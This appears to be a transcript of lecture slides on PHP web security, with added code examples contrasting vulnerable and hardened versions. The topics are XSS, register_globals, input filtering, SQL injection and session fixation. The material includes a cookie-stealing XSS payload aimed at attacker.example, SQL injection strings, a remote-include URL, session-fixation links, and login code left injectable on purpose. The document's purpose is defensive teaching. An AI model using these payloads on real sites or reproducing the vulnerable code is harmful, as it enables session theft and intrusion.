PHP Security Computer Security

Upload: elaine-shona-jackson

Post on 26-Dec-2015


TRANSCRIPT

Page 1: PHP Security Computer Security. overview  Xss, Css  Register_globals  Data Filtering  Sql Injection  Session Fixation

PHP Security

Computer Security

Page 2:

Overview

XSS (CSS)

register_globals

Data Filtering

SQL Injection

Session Fixation

Page 3:

Cross Site Scripting (XSS; these slides also use the older abbreviation CSS)

The goal of an XSS attack is to steal the client's cookies, or any other sensitive information that identifies the client to the web site. With the legitimate user's token in hand, the attacker can act as that user in his or her interaction with the site, i.e. impersonate the user.

(attention to the sample)

Page 4:

Another sample

Page 5:

Another sample (cont)

Page 6:

Prevent
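The prevention the slide refers to, as an added example that is not from the original deck: the same reflected value echoed raw and then encoded with htmlspecialchars() for the HTML context. The parameter name "name", the attacker.example host and the payload are constructed for illustration.

```php
<?php
// Added example, not part of the slides: reflected XSS and its fix.
// "name", attacker.example and the payload below are illustrative.

declare(strict_types=1);

// Vulnerable: the request value is written straight into the HTML response,
// so any markup in it is parsed and any <script> in it runs in the victim's
// browser with access to document.cookie for this site.
function greet_vulnerable(string $name): string
{
    return "<p>Hello, " . $name . "</p>";
}

// Hardened: encode at output time, for the context the value lands in.
// ENT_QUOTES also encodes ' so the same helper is safe inside a quoted
// attribute; ENT_SUBSTITUTE keeps invalid UTF-8 from blanking the output;
// the charset must match the page's declared encoding.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function greet_safe(string $name): string
{
    return "<p>Hello, " . esc($name) . "</p>";
}

// Constructed payload of the kind the slide describes: it sends the
// victim's cookie to a host the attacker controls.
$payload = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// In a real page the value would be $_GET['name'] ?? ''; both calls are
// shown here on the same input so the two responses can be compared.
echo greet_vulnerable($payload), "\n";
echo greet_safe($payload), "\n";
```

The first response contains a live script tag, the second only text in which every < > " ' has become an entity. Encoding belongs at output, not at input, and it is context specific: a value placed inside a JavaScript string or a URL needs json_encode() or rawurlencode() instead. Marking the session cookie HttpOnly (session.cookie_httponly=1) keeps document.cookie from revealing it even when a script does run.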

Page 7:

register_globals: poor security

Login.php:

<?php
if (authenticated_user()) {
    $authorized = true;
}
if ($authorized) {
    include "Access.php";
}
?>

Risk: with register_globals on, every request parameter becomes a global variable before the script runs, so a request for

Login.php?authorized=1

sets $authorized = 1 ahead of the check, and Access.php is included for a user who never authenticated. The fix is to initialise $authorized = false at the top of the script and to read input only from $_GET, $_POST or $_REQUEST.

Page 8:

register_globals: poor security

Run.php:

<?php include "$path/script.php"; ?>

Risk: a request for

Run.php?path=http%3A%2F%2Fwww.mysite.com%2F%3F

sets $path to http://www.mysite.com/? and the include becomes

<?php include 'http://www.mysite.com/?/script.php'; ?>

If allow_url_fopen is enabled (it is on by default, even in php.ini-recommended), this includes the output of http://www.mysite.com/ just as if it were a local file, so whoever controls that host chooses the PHP code that runs on the server. Since PHP 5.2 a URL include additionally requires allow_url_include, which is off by default, and register_globals itself was removed in PHP 5.4; the $path pattern is still dangerous on its own, because a local path such as ../../etc/passwd would be included too.
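The two slides above rewritten the way a practitioner would, as an added example that is not from the original deck: variables initialised before use, input read only from the superglobals, and the include resolved from an allowlist under a fixed directory. The session key, Access.php, the scripts directory and the allowlisted names are assumptions.

```php
<?php
// Added example, not part of the slides: slides 7 and 8 made safe whether
// register_globals is on or off. The session key, Access.php, the scripts
// directory and the allowlisted script names are assumptions.

declare(strict_types=1);

session_start();

function authenticated_user(): bool
{
    // Illustrative: the login handler is assumed to store the user id in
    // the session only after it has verified the credentials.
    return isset($_SESSION['user_id']);
}

// Slide 7, fixed: initialise first and decide from the function result
// alone. A request for Login.php?authorized=1 can no longer pre-set it.
$authorized = false;
if (authenticated_user()) {
    $authorized = true;
}
if ($authorized) {
    include __DIR__ . '/Access.php';
}

// Slide 8, fixed: input never shapes an include path. The request names an
// entry in a fixed allowlist; the file is resolved under one directory and
// the resolved path is checked against that directory.
const ALLOWED_SCRIPTS = ['report', 'export', 'status'];

function resolve_script(string $base_dir, ?string $name): ?string
{
    if ($name === null || !in_array($name, ALLOWED_SCRIPTS, true)) {
        return null;
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . '/' . $name . '.php');
    // realpath() is false for a missing file and resolves symlinks, so the
    // prefix check also rejects a link inside the directory that points out.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$script = resolve_script(__DIR__ . '/scripts', $_GET['path'] ?? null);
if ($script === null) {
    http_response_code(400);
    exit('unknown script');
}
include $script;
```

The allowlist is the real control; the realpath() prefix check is defence in depth for the day someone widens the list to a pattern. Keep allow_url_include=Off (the default) so a URL can never satisfy an include at all.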

Page 9:

Data Filtering

Filtering Examples

The following validates an email address:

<?php
$clean = array();
$email_pattern = '/^[^@\s]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';
if (preg_match($email_pattern, $_POST['email'])) {
    $clean['email'] = $_POST['email'];
}
?>

Page 10:

Data Filtering

Filtering Examples

The following example ensures that $_POST['num'] is an integer:

<?php
$clean = array();
// === rather than ==: PHP compares two numeric strings numerically under ==,
// so "1.0" == "1" and "01" == "1" are true and non-integers would slip through.
if ($_POST['num'] === strval(intval($_POST['num']))) {
    $clean['num'] = $_POST['num'];
}
?>

The following example ensures that $_POST['num'] is a float:

<?php
$clean = array();
// Same strict comparison: only the canonical representation passes
// ("1.5" does, "1.50" and " 1.5" do not).
if ($_POST['num'] === strval(floatval($_POST['num']))) {
    $clean['num'] = $_POST['num'];
}
?>

Both checks are round-trip tests: convert, print back, and accept only if nothing changed. The value kept in $clean is still a string; cast it when you use it, or use filter_var() with FILTER_VALIDATE_INT / FILTER_VALIDATE_FLOAT, which validates and converts in one step.
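The three filters from these slides done with filter_var(), as an added example that is not from the original deck. The helper and the two request bodies are constructed for illustration; the field names follow the slides.

```php
<?php
// Added example, not part of the slides: the email, integer and float
// filters with filter_var(), which returns the typed value or false, so the
// check and the conversion are one step. The input arrays are constructed.

declare(strict_types=1);

function filter_request(array $raw): array
{
    $clean = [];

    // Replaces the hand-written regex from slide 9.
    $email = filter_var($raw['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email !== false) {
        $clean['email'] = $email;
    }

    // Integer: rejects "1.0", "01", "1e3" and "1abc" (surrounding whitespace
    // is trimmed, a leading sign is allowed) and bounds the value as well.
    $num = filter_var($raw['num'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 1000000]]);
    if ($num !== false) {
        $clean['num'] = $num;        // an int now, not a string
    }

    // Float: accepts "1.5" and "1e3", rejects "1,5" and "abc".
    $price = filter_var($raw['price'] ?? '', FILTER_VALIDATE_FLOAT);
    if ($price !== false) {
        $clean['price'] = $price;    // a float now
    }

    return $clean;
}

// Constructed request bodies: one well-formed, one made of the edge cases
// the round-trip checks on the slides are weakest against.
$good = ['email' => 'alice@example.com', 'num' => '42',  'price' => '19.99'];
$bad  = ['email' => 'alice@@example',    'num' => '1.0', 'price' => 'abc'];

var_dump(filter_request($good));
var_dump(filter_request($bad));
```

The first dump holds three typed values, the second is an empty array: every key is either present with the right type or absent, which is the property the rest of the script should rely on.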

Page 11:

Databases and SQL

Put the database user name and password in a file outside the web root, for example Test/conn:

SetEnv DB_USER "myuser"
SetEnv DB_PASS "1234"
SetEnv DB_HOST "myhost"

Include this file from httpd.conf as follows:

Include "Test/conn"

The values arrive in $_SERVER, so the script itself never contains the credentials:

<?php
// db.inc
// mysql_connect() belongs to the mysql extension, which PHP 7 removed;
// there use mysqli_connect() or PDO with the same three values.
$db = mysql_connect($_SERVER['DB_HOST'], $_SERVER['DB_USER'], $_SERVER['DB_PASS']);
?>

Be careful not to expose these variables with something like phpinfo() or print_r($_SERVER). A SetEnv in the main server configuration is visible to every script Apache runs, so on a shared host the lines belong inside the site's own <VirtualHost> block.

Page 12:

SQL Injection: WHERE hacking

<?php
// if (isset($_POST['submit'])) {
$db = mysql_connect("localhost", "Hawk", "3");
mysql_select_db("user", $db);
// echo $db;
// echo $_POST['user'];
// Vulnerable on purpose: the posted values are spliced into the SQL text.
$sql = "select * from user where UserName='" . $_POST['user'] . "' and Pass='" . $_POST['pass'] . "'";
// echo $sql;
$result = mysql_query($sql);
while ($row = mysql_fetch_array($result)) {
    echo "<h4> Name: " . $row["UserName"] . ', ' . $row["Pass"] . "</h4> \n";
}
mysql_close();
// } else
//     echo "Nothing";
?>

Page 13:

SQL Injection

The statement is assembled as

$sql = "select * from user where UserName='" . $_POST['user'] . "' and Pass='" . $_POST['pass'] . "'";

so with the user name ym and the password

2' or '1'='1

the query sent to the server is

select * from user where UserName='ym' and Pass='2' or '1'='1'

The final OR is always true, so the WHERE clause matches every row in the table and the password is never really checked.

Page 14:

Normal request (user name ym, password ym):

select * from user where UserName='ym' and Pass='ym'

Injected SELECT, with the user name set to   ym';--   so that everything after the comment marker is ignored and the password condition disappears:

select * from user where UserName='ym';-- ' and Pass=''

Page 15:

Prevent

• Use stored procedures, and more generally prepared statements with bound parameters (mysqli or PDO): the SQL text is fixed and the values travel separately, so quotes in the input are data, never syntax.

• ctype_alnum — check for alphanumeric character(s)

• ctype_alpha — check for alphabetic character(s)

• mysql_real_escape_string — escapes special characters in a string for use in an SQL statement. It is only correct after mysql_set_charset() has told it the connection's character set, and it disappears with the mysql extension in PHP 7; it is a last resort, not a replacement for parameters.
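The login query from slide 12 built by concatenation next to its parameterised form, as an added example that is not from the original deck. It runs against an in-memory SQLite table with constructed rows so the difference is visible without a MySQL server; the table and column names follow the slide.

```php
<?php
// Added example, not part of the slides: concatenated versus prepared login
// query, run on a constructed in-memory SQLite table (pdo_sqlite). Table,
// column names and the payload follow slides 12 and 13.

declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE user (UserName TEXT, Pass TEXT)');
$db->exec("INSERT INTO user VALUES ('ym', 'secret'), ('Hawk', '3')");

// Slide 12 as written: the input becomes part of the SQL text.
function login_concat(PDO $db, string $user, string $pass): array
{
    $sql = "select * from user where UserName='" . $user . "' and Pass='" . $pass . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the SQL text is constant; the values are bound as parameters and
// reach the engine as data, so a quote in them cannot end the literal.
// With pdo_mysql also set PDO::ATTR_EMULATE_PREPARES => false so the server,
// not the driver, does the parsing.
function login_prepared(PDO $db, string $user, string $pass): array
{
    $stmt = $db->prepare('select * from user where UserName = ? and Pass = ?');
    $stmt->execute([$user, $pass]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The payload from slide 13: a password that turns the WHERE clause into
// "... and Pass='2' or '1'='1'".
$user = 'ym';
$pass = "2' or '1'='1";

printf("concatenated: %d row(s)\n", count(login_concat($db, $user, $pass)));
printf("prepared:     %d row(s)\n", count(login_prepared($db, $user, $pass)));
```

The concatenated query matches both rows because the injected OR is always true; the prepared one matches none because it looks for a user whose password is literally the payload string. The stored plaintext passwords are kept only to mirror the slide; a real table holds password_hash() output and the script compares with password_verify().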

Page 16:

Session Fixation

There are three common methods an attacker uses to obtain a valid session identifier:

1. Prediction

2. Capture

3. Fixation

Prediction means guessing a valid session identifier. With PHP's native session mechanism the identifier is extremely random, and this is unlikely to be the weakest point in your implementation.

Capturing a valid session identifier is the most common type of session attack, and there are numerous approaches. Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been in Internet Explorer, and cookies are slightly less exposed than GET variables. Thus, for users who enable cookies, you can provide a more secure mechanism.

Fixation means the attacker chooses the identifier and gets the victim to use it. In the simplest case, a session fixation attack can use a link:

<a href="http://host/index.php?PHPSESSID=1234">Click here</a>

or a protocol-level redirect:

<?php header('Location: http://host/index.php?PHPSESSID=1234'); ?>

If the application accepts the identifier from the URL and keeps using it after the victim logs in, the attacker, who already knows it, holds an authenticated session without ever having to predict or capture it.

Page 17:

Session Fixation

Page 18:

<?php
// Demo script: when session.use_only_cookies is off, PHP adopts the PHPSESSID
// handed to it in the URL, so after the fixation link above this counter
// starts counting under the attacker-chosen identifier 1234.
session_start();
if (!isset($_SESSION['visits'])) {
    $_SESSION['visits'] = 1;
} else {
    $_SESSION['visits']++;
}
echo $_SESSION['visits'];
?>

Session Fixation
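A login handler that defeats the fixation link from slide 16, as an added example that is not from the original deck: it refuses identifiers the server never issued, takes the identifier from the cookie only, and issues a fresh identifier the moment the user authenticates. verify_credentials() and its hard-coded user are placeholders for the site's own check; the array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example, not part of the slides: session handling that survives a
// fixation attempt. verify_credentials() and its user are placeholders.

declare(strict_types=1);

// Reject ids the server did not create (PHP 5.5.2+): an attacker-supplied
// PHPSESSID=1234 is discarded and a fresh id is generated instead.
ini_set('session.use_strict_mode', '1');
// Take the id from the cookie only, never from ?PHPSESSID= in the URL.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
// Keep the cookie out of document.cookie (XSS) and off plain HTTP.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);

session_start();

function verify_credentials(string $user, string $pass): bool
{
    // Illustrative only: real code looks the user up and calls password_verify().
    return $user === 'ym' && $pass === 'secret';
}

$user = $_POST['user'] ?? '';
$pass = $_POST['pass'] ?? '';
if (is_string($user) && is_string($pass) && $user !== '' && verify_credentials($user, $pass)) {
    // Privilege just changed: move the data to a new id and delete the old
    // one, so an id fixed before login is worthless afterwards.
    session_regenerate_id(true);
    $_SESSION['user']       = $user;
    $_SESSION['login_time'] = time();
}

// The counter from slide 18 still works: regenerating the id keeps $_SESSION.
$_SESSION['visits'] = ($_SESSION['visits'] ?? 0) + 1;
echo $_SESSION['visits'];
```

Strict mode and cookie-only ids stop the attack in the first place; session_regenerate_id(true) on login is the backstop for any path where an attacker did manage to plant an id, and the same call belongs at every other privilege change. The secure flag means the cookie is not sent over plain HTTP, so a local test needs HTTPS or that flag turned off.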

Page 19: